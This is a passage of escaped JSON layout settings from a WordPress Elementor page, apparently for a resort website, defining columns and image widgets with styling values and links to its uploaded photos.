\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bf79270\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9ae99af\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"83e04d3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ec9a0fe\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"76a7de2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/walleyelimit02-016.jpg\",\"id\":368},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"df5f462\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5aa2626\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"48945bf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3f4ba65\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"e432149\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC03568.jpg\",\"id\":346},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1cc6404\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":